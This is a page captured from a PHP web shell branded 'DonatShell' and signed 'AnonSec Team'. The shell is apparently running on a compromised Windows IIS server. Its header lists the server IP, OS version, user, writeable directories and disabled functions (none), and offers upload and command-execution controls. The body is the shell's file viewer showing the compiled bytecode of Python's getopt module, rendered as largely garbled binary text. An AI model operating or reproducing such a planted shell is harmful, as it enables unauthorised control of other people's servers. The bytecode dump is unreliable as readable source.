DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files (x86)/MySQL/MySQL Workbench 6.1 CE/python/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Program Files (x86)/MySQL/MySQL Workbench 6.1 CE/python/lib//getopt.pyc
ó
 ¤'Sc@s¹dZddddgZddlZdefd„ƒYZeZgd„Zgd	„Zd
„Zd„Z	d„Z
d
„Zedkrµddl
Z
ee
jddddgƒGHndS(sŠParser for command line options.

This module helps scripts to parse the command line arguments in
sys.argv.  It supports the same conventions as the Unix getopt()
function (including the special meanings of arguments of the form `-'
and `--').  Long options similar to those supported by GNU software
may be used as well via an optional third argument.  This module
provides two functions and an exception:

getopt() -- Parse command line options
gnu_getopt() -- Like getopt(), but allow option and non-option arguments
to be intermixed.
GetoptError -- exception (class) raised with 'opt' attribute, which is the
option involved with the exception.
tGetoptErrorterrortgetoptt
gnu_getopti’’’’NcBs)eZdZdZdd„Zd„ZRS(tcCs)||_||_tj|||ƒdS(N(tmsgtoptt	Exceptiont__init__(tselfRR((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyR)s		cCs|jS(N(R(R	((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyt__str__.s(t__name__t
__module__RRRR
(((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyR&scCsņg}t|ƒtdƒkr*|g}nt|ƒ}xÆ|rē|djdƒrē|ddkrē|ddkr€|d}Pn|djdƒr½t||dd||dƒ\}}q9t||dd||dƒ\}}q9W||fS(s@getopt(args, options[, long_options]) -> opts, args

    Parses command line options and parameter list.  args is the
    argument list to be parsed, without the leading reference to the
    running program.  Typically, this means "sys.argv[1:]".  shortopts
    is the string of option letters that the script wants to
    recognize, with options that require an argument followed by a
    colon (i.e., the same format that Unix getopt() uses).  If
    specified, longopts is a list of strings with the names of the
    long options which should be supported.  The leading '--'
    characters should not be included in the option name.  Options
    which require an argument should be followed by an equal sign
    ('=').

    The return value consists of two elements: the first is a list of
    (option, value) pairs; the second is the list of program arguments
    left after the option list was stripped (this is a trailing slice
    of the first argument).  Each option-and-value pair returned has
    the option as its first element, prefixed with a hyphen (e.g.,
    '-x'), and the option argument as its second element, or an empty
    string if the option has no argument.  The options occur in the
    list in the same order in which they were found, thus allowing
    multiple occurrences.  Long and short options may be mixed.

    Rit-s--ii(ttypetlistt
startswithtdo_longst	do_shorts(targst	shortoptstlongoptstopts((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyR3s,
*+cCsjg}g}t|tƒr'|g}nt|ƒ}|jdƒrU|d}t}n!tjjdƒrpt}nt}xē|r_|ddkr”||d7}Pn|dd dkrßt	||dd||dƒ\}}qy|dd dkr-|ddkr-t
||dd||dƒ\}}qy|rA||7}Pqy|j|dƒ|d}qyW||fS(sgetopt(args, options[, long_options]) -> opts, args

    This function works like getopt(), except that GNU style scanning
    mode is used by default. This means that option and non-option
    arguments may be intermixed. The getopt() function stops
    processing options as soon as a non-option argument is
    encountered.

    If the first character of the option string is `+', or if the
    environment variable POSIXLY_CORRECT is set, then option
    processing stops as soon as a non-option argument is encountered.

    t+itPOSIXLY_CORRECTis--iR
(t
isinstancetstrRRtTruetostenvirontgettFalseRRtappend(RRRRt	prog_argstall_options_first((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyR^s2
			*$*
cCsķy|jdƒ}Wntk
r,d}nX|| ||d}}t||ƒ\}}|r¤|dkrĘ|s‰td||ƒ‚n|d|d}}qĘn"|dk	rĘtd||ƒ‚n|jd||pÜdfƒ||fS(Nt=isoption --%s requires argumentis%option --%s must not have an arguments--R(tindext
ValueErrortNonet
long_has_argsRR (RRRRtitoptargthas_arg((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyRs

cCsźg|D]}|j|ƒr|^q}|sDtd||ƒ‚n||krZt|fS|d|krtt|fSt|ƒdkrœtd||ƒ‚nt|ƒdks“t‚|d}|jdƒ}|rą|d }n||fS(Nsoption --%s not recognizedR#isoption --%s not a unique prefixii’’’’(RRRRtlentAssertionErrortendswith(RRtot
possibilitiestunique_matchR*((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyR'¦s(



cCs®x”|dkr£|d|d}}t||ƒrƒ|dkrs|s[td||ƒ‚n|d|d}}n|d}}nd}|jd||fƒqW||fS(NRiisoption -%s requires argumentR
(t
short_has_argRR (Rt	optstringRRRR)((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyR»s
cCshxNtt|ƒƒD]:}|||ko4dknr|jd|dƒSqWtd||ƒ‚dS(Nt:isoption -%s not recognized(trangeR+RR(RRR(((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyR1Źs t__main__isa:bsalpha=tbeta(t__doc__t__all__RRRRRRRR'RR1Rtsystargv(((sHC:\Program Files (x86)\MySQL\MySQL Workbench 6.1 CE\Python\Lib\getopt.pyt<module>s+2				

Anon7 - 2022
AnonSec Team